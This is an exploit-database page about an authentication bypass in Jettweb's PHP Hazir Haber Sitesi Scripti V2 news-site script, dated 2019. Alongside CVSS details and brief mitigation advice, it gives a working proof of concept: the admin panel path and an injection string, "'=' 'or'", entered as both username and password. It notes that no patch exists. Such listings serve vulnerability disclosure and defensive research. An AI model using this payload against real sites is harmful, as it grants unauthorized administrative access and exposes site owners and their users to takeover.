header-logo
Suggest Exploit
vendor:
PHP Hazir Haber Sitesi Scripti V2
by:
Ahmet Ümit BAYRAM
5.5
CVSS
MEDIUM
Authentication Bypass
287
CWE
Product Name: PHP Hazir Haber Sitesi Scripti V2
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:jettweb:php_hazir_haber_sitesi_scripti_v2
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

Jettweb PHP Hazir Haber Sitesi Scripti V2 – Authentication Bypass

This exploit allows an attacker to bypass authentication in the Jettweb PHP Hazir Haber Sitesi Scripti V2. By manipulating the username and password fields, an attacker can gain unauthorized access to the administration panel.

Mitigation:

The vendor should release a patch to fix the authentication bypass vulnerability. In the meantime, users can mitigate the risk by implementing strong passwords and using additional security measures such as IP whitelisting.
Source

Exploit-DB raw data:

# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V2 - Authentication Bypass
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html
# Demo Site: http://haberv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'

Navigation

Suggest Exploit

Services By CQR